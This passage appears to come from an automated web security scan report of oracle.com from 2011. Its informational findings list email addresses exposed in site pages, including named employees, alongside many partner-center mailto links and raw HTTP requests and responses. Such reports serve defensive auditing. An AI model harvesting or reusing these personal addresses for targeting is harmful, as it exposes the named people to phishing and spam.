<a href="mailto:partnerbusinesscenter-al_ww@oracle.com">partnerbusinesscenter-al_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-at_ww@oracle.com">partnerbusinesscenter-at_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ru_ww@oracle.com">partnerbusinesscenter-ru_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-be_ww@oracle.com">partnerbusinesscenter-be_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ba_ww@oracle.com">partnerbusinesscenter-ba_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-br_ww@oracle.com">partnerbusinesscenter-br_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-bg_ww@oracle.com">partnerbusinesscenter-bg_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-nas_ww@oracle.com">partnerbusinesscenter-nas_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cl_ww@oracle.com">partnerbusinesscenter-cl_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cn_ww@oracle.com">partnerbusinesscenter-cn_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-co_ww@oracle.com">partnerbusinesscenter-co_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hr_ww@oracle.com">partnerbusinesscenter-hr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cy_ww@oracle.com">partnerbusinesscenter-cy_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cz_ww@oracle.com">partnerbusinesscenter-cz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ec_ww@oracle.com">partnerbusinesscenter-ec_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ee_ww@oracle.com">partnerbusinesscenter-ee_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fi_ww@oracle.com">partnerbusinesscenter-fi_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-de_ww@oracle.com">partnerbusinesscenter-de_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gr_ww@oracle.com">partnerbusinesscenter-gr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hk_ww@oracle.com">partnerbusinesscenter-hk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hu_ww@oracle.com">partnerbusinesscenter-hu_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dk_ww@oracle.com">partnerbusinesscenter-dk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-in_ww@oracle.com">partnerbusinesscenter-in_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-id_ww@oracle.com">partnerbusinesscenter-id_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ie_ww@oracle.com">partnerbusinesscenter-ie_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-it_ww@oracle.com">partnerbusinesscenter-it_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:opn-office_jp@oracle.com">opn-office_jp@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-kz_ww@oracle.com">partnerbusinesscenter-kz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-kr_ww@oracle.com">partnerbusinesscenter-kr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-lv_ww@oracle.com">partnerbusinesscenter-lv_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-lt_ww@oracle.com">partnerbusinesscenter-lt_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-lu_ww@oracle.com">partnerbusinesscenter-lu_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hk_ww@oracle.com">partnerbusinesscenter-hk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-mk_ww@oracle.com">partnerbusinesscenter-mk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-my_ww@oracle.com">partnerbusinesscenter-my_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-mt_ww@oracle.com">partnerbusinesscenter-mt_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-mx_ww@oracle.com">partnerbusinesscenter-mx_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ua_ww@oracle.com">partnerbusinesscenter-ua_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-nl_ww@oracle.com">partnerbusinesscenter-nl_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-no_ww@oracle.com">partnerbusinesscenter-no_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-pe_ww@oracle.com">partnerbusinesscenter-pe_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ph_ww@oracle.com">partnerbusinesscenter-ph_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-pl_ww@oracle.com">partnerbusinesscenter-pl_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-pt_ww@oracle.com">partnerbusinesscenter-pt_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ro_ww@oracle.com">partnerbusinesscenter-ro_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ru_ww@oracle.com">partnerbusinesscenter-ru_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-rs_ww@oracle.com">partnerbusinesscenter-rs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sg_ww@oracle.com">partnerbusinesscenter-sg_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sk_ww@oracle.com">partnerbusinesscenter-sk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-si_ww@oracle.com">partnerbusinesscenter-si_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-es_ww@oracle.com">partnerbusinesscenter-es_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-se_ww@oracle.com">partnerbusinesscenter-se_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-chde_ww@oracle.com">partnerbusinesscenter-chde_ww@oracle.com</a> <br /><a href="mailto:partnerbusinesscenter-chfr_ww@oracle.com">partnerbusinesscenter-chfr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tw_ww@oracle.com">partnerbusinesscenter-tw_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-th_ww@oracle.com">partnerbusinesscenter-th_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ua_ww@oracle.com">partnerbusinesscenter-ua_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-uk_ww@oracle.com">partnerbusinesscenter-uk_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-nas_ww@oracle.com">partnerbusinesscenter-nas_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ve_ww@oracle.com">partnerbusinesscenter-ve_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-vn_ww@oracle.com">partnerbusinesscenter-vn_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com<br />
...[SNIP]...
<a href="mailto:partnerbusinesscenter-fr_ww@oracle.com">partnerbusinesscenter-fr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-egsa_ww@oracle.com">partnerbusinesscenter-egsa_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...

22.63. http://www.oracle.com/technetwork/oramag/magazine/home/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oramag/magazine/home/index.html

Issue detail

The following email addresses were disclosed in the response:

jennifer.hamilton@oracle.com
opubedit_us@oracle.com

Request

GET /technetwork/oramag/magazine/home/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075635268300620,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="mailto:opubedit_us@oracle.com">opubedit_us@oracle.com</a>
...[SNIP]...
<a href="mailto:jennifer.hamilton@oracle.com">jennifer.hamilton@oracle.com</a>
...[SNIP]...

22.64. http://www.oracle.com/us/assets/masterhp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/assets/masterhp.js

Issue detail

The following email address was disclosed in the response:

santhosh.shanmugasundaram@oracle.com

Request

GET /us/assets/masterhp.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: Application/js
SS_FRIENDLY_EXT: js
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=41041090844582734,0:1)
Content-Length: 6698
Date: Tue, 06 Sep 2011 15:53:59 GMT
Connection: close

//    Author: santhosh.shanmugasundaram@oracle.com
//    Created Date: 3.9.2009
//    Revisions: v 1.0
/* Start Rotating banner code */

var theImage = new Array()
theImage[0] = 'one_on'
theImage[1] = 'two_on'
theImage[2] = 'three_on'
theImage[3]
...[SNIP]...

22.65. http://www.oracle.com/us/ciocentral/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/ciocentral/index.html

Issue detail

The following email address was disclosed in the response:

indy.kooiker@oracle.com

Request

Response

22.66. http://www.oracle.com/us/corporate/Acquisitions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/Acquisitions/index.html

Issue detail

The following email address was disclosed in the response:

acquisition-inquiries_ww@oracle.com

Request

GET /us/corporate/Acquisitions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.67. http://www.oracle.com/us/corporate/analystrelations/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/analystrelations/index.html

Issue detail

The following email addresses were disclosed in the response:

alison.odonnell@oracle.com
brenda.connor@oracle.com
carla.croghan@oracle.com
carol.sato@oracle.com
claire.dessaux@oracle.com
emilia.wasiak@oracle.com
karen.bitran@oracle.com
paul.j.phillips@oracle.com
terina.doherty@oracle.com
toshiaki.hine@oracle.com

Request

GET /us/corporate/analystrelations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=40288174477304969,0:1)
Date: Tue, 06 Sep 2011 16:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:carol.sato@oracle.com">carol.sato@oracle.com</a>
...[SNIP]...
<a href="mailto:claire.dessaux@oracle.com">claire.dessaux@oracle.com</a>
...[SNIP]...
<a href="mailto:brenda.connor@oracle.com">brenda.connor@oracle.com</a>
...[SNIP]...
<a href="mailto:claire.dessaux@oracle.com">claire.dessaux@oracle.com</a>
...[SNIP]...
<a href="mailto:carla.croghan@oracle.com">carla.croghan@oracle.com</a>
...[SNIP]...
